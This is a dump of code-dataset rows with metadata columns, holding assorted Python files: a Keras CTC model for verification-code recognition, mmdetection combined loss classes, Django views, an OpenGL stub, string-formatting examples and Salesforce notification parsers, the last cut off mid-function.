| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c32acf1de0094eb1e0efc07d07f7f6d518ae08ae
| 2,975
|
py
|
Python
|
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | null | null | null |
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | 1
|
2021-06-25T20:32:49.000Z
|
2021-06-27T13:24:09.000Z
|
ctc/ctc_model.py
|
mengzhu0308/Tencent-Verification-Code-Recognition
|
3afd20dc2ab754ee1f9746bd32d225b09241d694
|
[
"Apache-2.0"
] | null | null | null |
#! -*- coding:utf-8 -*-
'''
@Author: ZM
@Date and Time: 2021/1/8 16:23
@File: ctc_model.py
'''
from keras.layers import *
def CTC_Model(x, num_classes=26):
x = Conv2D(16, 3, use_bias=False, padding='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Conv2D(32, 3, use_bias=False, padding='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
residual = Conv2D(64, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(64, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(64, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
residual = Conv2D(128, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu')(x)
x = SeparableConv2D(128, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(128, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
residual = Conv2D(364, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
for i in range(8):
residual = x
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = add([residual, x])
residual = Conv2D(512, 1, strides=2, use_bias=False)(x)
residual = BatchNormalization()(residual)
x = SeparableConv2D(364, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = SeparableConv2D(512, 3, padding='same', use_bias=False)(x)
x = BatchNormalization()(x)
x = MaxPooling2D(pool_size=3, strides=2, padding='same')(x)
x = add([x, residual])
x = Permute((2, 1, 3))(x)
x = Reshape((9, -1))(x)
x = Bidirectional(CuDNNLSTM(256, return_sequences=True))(x)
x = Bidirectional(CuDNNLSTM(128, return_sequences=True))(x)
x = Bidirectional(CuDNNLSTM(512, return_sequences=True))(x)
x = Dense(num_classes + 1)(x)
return x
| 35
| 70
| 0.619496
| 403
| 2,975
| 4.503722
| 0.153846
| 0.050689
| 0.112397
| 0.107438
| 0.852342
| 0.840771
| 0.840771
| 0.793388
| 0.793388
| 0.792837
| 0
| 0.052809
| 0.20437
| 2,975
| 85
| 71
| 35
| 0.713984
| 0.03395
| 0
| 0.707692
| 0
| 0
| 0.039065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.015385
| 0
| 0.046154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3520349464129844484c4a19bbb4670712c35ef
| 86
|
py
|
Python
|
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
Services/__init__.py
|
GeneralizedLearningUtilities/Dinosaurs
|
7e18f1f7f28ff84e8e606a9670809ce6cf38f0db
|
[
"Apache-2.0"
] | null | null | null |
import Util.ModuleRegistration
Util.ModuleRegistration.importAllInDirectory(__file__)
| 28.666667
| 54
| 0.906977
| 7
| 86
| 10.571429
| 0.714286
| 0.594595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034884
| 86
| 2
| 55
| 43
| 0.891566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5edafb6a8d469b15eca245a326de97f79f07087f
| 56
|
py
|
Python
|
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
tests/square_2d/test.py
|
saustinp/3D-CG
|
8d3e161674273649af1f23b2a0e1d5100971477a
|
[
"MIT"
] | null | null | null |
from main import test_2d_square
print(test_2d_square())
| 18.666667
| 31
| 0.839286
| 10
| 56
| 4.3
| 0.7
| 0.27907
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0.089286
| 56
| 3
| 32
| 18.666667
| 0.803922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
5ee17bfcf18cc3e4b38ebdfab21ae9f922f96cd7
| 9,940
|
py
|
Python
|
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
mmdet/models/losses/combine_loss.py
|
hmtrii/mmdetection
|
a998e0ac45118482b4a1fa320c2f0611f35fb0d1
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from ..builder import LOSSES, build_loss
@LOSSES.register_module()
class BCE_Boundary_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_Boundary_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='BoundaryLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
boundary_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*boundary_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*boundary_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*boundary_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_HD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_HD_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='HausdorffDTLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
hd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss +cur_alpha*hd_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*hd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_BD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_BD_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='BoundaryLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
bd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*bd_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*bd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*bd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_HD_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_HD_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='HausdorffDTLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
hd_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*hd_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*hd_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_SDF_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_SDF_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='SDFLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
sdf_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*sdf_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class Dice_SDF_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(Dice_SDF_Loss, self).__init__()
loss_mask_1=dict(type='DiceLoss')
loss_mask_2=dict(type='SDFLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
dice_loss = self.cls_criterion_1(pred, target, label)
sdf_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = dice_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "increase":
combine_loss = dice_loss + cur_alpha*sdf_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*dice_loss + cur_alpha*sdf_loss
self.count_iter += 1
return combine_loss
@LOSSES.register_module()
class BCE_Dice_Loss(nn.Module):
def __init__(self, start_alpha, step_alpha, max_alpha, alpha_strategy):
super(BCE_Dice_Loss, self).__init__()
loss_mask_1=dict(type='CrossEntropyLoss', use_mask=True, loss_weight=1.0)
loss_mask_2=dict(type='DiceLoss')
self.cls_criterion_1 = build_loss(loss_mask_1)
self.cls_criterion_2 = build_loss(loss_mask_2)
self.start_alpha = start_alpha
self.max_alpha = max_alpha
self.step_alpha = step_alpha
self.alpha_strategy = alpha_strategy
self.count_iter = 0
def forward(self, pred, target, label):
bce_loss = self.cls_criterion_1(pred, target, label)
dice_loss = self.cls_criterion_2(pred, target, label)
cur_alpha = self.start_alpha + int(self.count_iter / 1120) * self.step_alpha
if cur_alpha > self.max_alpha:
cur_alpha = self.max_alpha
if self.alpha_strategy == "constant":
# if constant: alpha, step_alpha = 0.0, max_alpha = 1.0
combine_loss = bce_loss + cur_alpha*dice_loss
elif self.alpha_strategy == "increase":
combine_loss = bce_loss + cur_alpha*dice_loss
elif self.alpha_strategy == "rebalance":
combine_loss = (1-cur_alpha)*bce_loss + cur_alpha*dice_loss
self.count_iter += 1
return combine_loss
| 42.478632
| 85
| 0.648994
| 1,357
| 9,940
| 4.365512
| 0.043478
| 0.066172
| 0.075625
| 0.060263
| 0.982782
| 0.982782
| 0.975017
| 0.975017
| 0.968433
| 0.966745
| 0
| 0.019184
| 0.260563
| 9,940
| 234
| 86
| 42.478632
| 0.786803
| 0.037928
| 0
| 0.854167
| 0
| 0
| 0.036362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.015625
| 0
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ef413f33aa8fca3d3259d7fc81852423f83e291
| 278
|
py
|
Python
|
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
Main/Test_Python_1.py
|
tamalbag117/Python_Practice
|
52d008682b9828043617b789a8ebf441048cd0de
|
[
"MIT"
] | null | null | null |
f1 = open("name.txt")
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
print(f1.readline())
print(f1.tell())
f1.close()
| 17.375
| 21
| 0.672662
| 45
| 278
| 4.155556
| 0.177778
| 0.486631
| 0.411765
| 0.513369
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0.893048
| 0
| 0.057471
| 0.061151
| 278
| 15
| 22
| 18.533333
| 0.659004
| 0
| 0
| 0.866667
| 0
| 0
| 0.028777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.866667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
6f04c5bc885f9b2a867972c4577b2d8121faad37
| 358
|
py
|
Python
|
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
OpenGLCffi/GL/EXT/NV/copy_image.py
|
cydenix/OpenGLCffi
|
c78f51ae5e6b655eb2ea98f072771cf69e2197f3
|
[
"MIT"
] | null | null | null |
from OpenGLCffi.GL import params
@params(api='gl', prms=['srcName', 'srcTarget', 'srcLevel', 'srcX', 'srcY', 'srcZ', 'dstName', 'dstTarget', 'dstLevel', 'dstX', 'dstY', 'dstZ', 'width', 'height', 'depth'])
def glCopyImageSubDataNV(srcName, srcTarget, srcLevel, srcX, srcY, srcZ, dstName, dstTarget, dstLevel, dstX, dstY, dstZ, width, height, depth):
pass
| 51.142857
| 172
| 0.687151
| 42
| 358
| 5.857143
| 0.595238
| 0.130081
| 0.195122
| 0.227642
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0.715447
| 0
| 0
| 0.111732
| 358
| 6
| 173
| 59.666667
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0.252809
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
6f4573f0f4d72bc0f74a21e2bd725440effc6160
| 557
|
py
|
Python
|
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | null | null | null |
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | null | null | null |
src/Strings/example3.py
|
ogycode/PythonFromZero
|
5d1e3967c7a1ddc53fd6b5551c4154bb601f351a
|
[
"Apache-2.0"
] | 1
|
2021-02-27T06:51:05.000Z
|
2021-02-27T06:51:05.000Z
|
print("Strings, (c) Verloka Vadim 2018\n\n\n")
S1 = "Hello, {0}, how are you{1}"
print(S1.format("Vadim", "?"))
print("{:<20}".format("left"))
print("{:>20}".format("right"))
print("{:^20}".format("right"))
print("{:*<20}".format("left"))
print("{:*>20}".format("right"))
print("{:*^20}".format("right"))
print("{:1<20}".format("left"))
print("{:1>20}".format("right"))
print("{:1^20}".format("right"))
print("int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(10076))
print("int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(10076))
| 27.85
| 75
| 0.54219
| 89
| 557
| 3.393258
| 0.303371
| 0.238411
| 0.258278
| 0.357616
| 0.761589
| 0.761589
| 0.725166
| 0.60596
| 0.60596
| 0.60596
| 0
| 0.092702
| 0.089767
| 557
| 20
| 75
| 27.85
| 0.502959
| 0
| 0
| 0
| 0
| 0.142857
| 0.487455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.928571
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
48a289a508c766bae8e7421dee702c66a0192461
| 229
|
py
|
Python
|
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
chapter-3/Rendering HTML/app/simple_app/views.py
|
PacktPublishing/Real-time-Django
|
07480a089fc0880d752d4ee5740ae6587de93aee
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def index(request):
return render(request, 'index.html', {})
def bingo(request):
return render(request, 'bingo.html', {})
def bmi(request):
return render(request, 'bmi.html', {})
| 22.9
| 44
| 0.681223
| 29
| 229
| 5.37931
| 0.413793
| 0.25
| 0.365385
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157205
| 229
| 10
| 45
| 22.9
| 0.80829
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0.428571
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
48ad224d6542afa788bbd90cec58b55c4848d133
| 21,997
|
py
|
Python
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 13
|
2017-08-07T15:45:49.000Z
|
2019-07-03T13:58:50.000Z
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 309
|
2017-07-14T02:34:12.000Z
|
2022-01-14T21:37:02.000Z
|
project/apps/salesforce/models.py
|
barberscore/barberscore-api
|
2aa9f8598c18c28ba1d4a294f76fd055619f803e
|
[
"BSD-2-Clause"
] | 5
|
2017-08-07T14:01:07.000Z
|
2019-06-24T19:44:55.000Z
|
import json
# Third-Party
from model_utils import Choices
from distutils.util import strtobool
# Local
from apps.bhs.models import Convention, Award, Chart, Group, Person
from apps.registration.models import Contest, Session, Assignment, Entry
class SfConvention:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Name
if hasattr(n, 'sf_Name'):
d['name'] = str(n.sf_Name.cdata)
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
season = int(float(n.sf_BS_Season__c.cdata))
d['season'] = season
# Panel
if hasattr(n, 'sf_BS_Panel__c'):
d['panel'] = int(float(n.sf_BS_Panel__c.cdata))
# Year
if hasattr(n, 'sf_Year__c'):
d['year'] = int(n.sf_Year__c.cdata)
# Open Date
if hasattr(n, 'sf_Open_Date__c'):
d['open_date'] = n.sf_Open_Date__c.cdata
# Close Date
if hasattr(n, 'sf_Close_Date__c'):
d['close_date'] = n.sf_Close_Date__c.cdata
# Start Date
if hasattr(n, 'sf_Start_Date__c'):
d['start_date'] = n.sf_Start_Date__c.cdata
# End Date
if hasattr(n, 'sf_End_Date__c'):
d['end_date'] = n.sf_End_Date__c.cdata
# Venue
if hasattr(n, 'sf_Venue__c'):
d['venue_name'] = n.sf_Venue__c.cdata
# Location
if hasattr(n, 'sf_Location__c'):
d['location'] = n.sf_Location__c.cdata
# Time Zone
if hasattr(n, 'sf_Time_Zone__c'):
d['timezone'] = n.sf_Time_Zone__c.cdata
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Divisions
if hasattr(n, 'sf_BS_Division__c'):
d['divisions'] = n.sf_BS_Division__c.cdata
# Kinds
if hasattr(n, 'sf_BS_Kind__c'):
d['kinds'] = n.sf_BS_Kind__c.cdata
# Return parsed dict
return d
class SfAward:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Name
if hasattr(n, 'sf_Name'):
d['name'] = n.sf_Name.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
d['status'] = int(float(n.sf_BS_Status__c.cdata))
# Kind
if hasattr(n, 'sf_BS_Kind__c'):
d['kind'] = int(float(n.sf_BS_Kind__c.cdata))
# Gender
d['gender'] = int(float(n.sf_BS_Classification__c.cdata)) if hasattr(n, 'sf_BS_Classification__c') else None
# Level
if hasattr(n, 'sf_BS_Level__c'):
d['level'] = int(float(n.sf_BS_Level__c.cdata))
# Season
if hasattr(n, 'sf_BS_Season__c'):
d['season'] = int(float(n.sf_BS_Season__c.cdata))
# District
if hasattr(n, 'sf_BS_District__c'):
d['district'] = int(float(n.sf_BS_District__c.cdata))
# Divisions
d['division'] = int(float(n.sf_BS_Division__c.cdata)) if hasattr(n, 'sf_BS_Division__c') else None
# Is Single
if hasattr(n, 'sf_is_single__c'):
d['is_single'] = bool(strtobool(n.sf_is_single__c.cdata))
# Threshold
d['threshold'] = float(n.sf_Threshold__c.cdata) if hasattr(n, 'sf_Threshold__c') else None
# Minimum
d['minimum'] = float(n.sf_Minimum__c.cdata) if hasattr(n, 'sf_Minimum__c') else None
# advance
d['advance'] = float(n.sf_Advance__c.cdata) if hasattr(n, 'sf_Advance__c') else None
# spots
d['spots'] = int(float(n.sf_Spots__c.cdata)) if hasattr(n, 'sf_Spots__c') else None
# Description
d['description'] = n.sf_Description__c.cdata if hasattr(n, 'sf_Description__c') else ""
# Notes
d['notes'] = n.sf_Notes__c.cdata if hasattr(n, 'sf_Notes__c') else ""
# Age
d['age'] = int(float(n.sf_BS_Age__c.cdata)) if hasattr(n, 'sf_BS_Age__c') else None
# Is Novice
if hasattr(n, 'sf_is_novice__c'):
d['is_novice'] = bool(strtobool(n.sf_is_novice__c.cdata))
# Size
d['size'] = int(float(n.sf_BS_Size__c.cdata)) if hasattr(n, 'sf_BS_Size__c') else None
# Size Range
d['size_range'] = n.sf_Size_Range__c.cdata if hasattr(n, 'sf_Size_Range__c') else None
# Scope
d['scope'] = int(float(n.sf_BS_Scope__c.cdata)) if hasattr(n, 'sf_BS_Scope__c') else None
# Scope Range
d['scope_range'] = n.sf_Scope_Range__c.cdata if hasattr(n, 'sf_Scope_Range__c') else None
# Tree Sort
d['tree_sort'] = int(float(n.sf_Tree_Sort__c.cdata)) if hasattr(n, 'sf_Tree_Sort__c') else None
# Return parsed dict
return d
class SfChart:
def parse_sf_notification(n):
d = {}
# Created
if hasattr(n, 'sf_CreatedDate'):
d['created'] = n.sf_CreatedDate.cdata
# Modified
if hasattr(n, 'sf_LastModifiedDate'):
d['modified'] = n.sf_LastModifiedDate.cdata
# UUID
if hasattr(n, 'sf_BS_UUID__c'):
d['id'] = n.sf_BS_UUID__c.cdata
# Status
if hasattr(n, 'sf_BS_Status__c'):
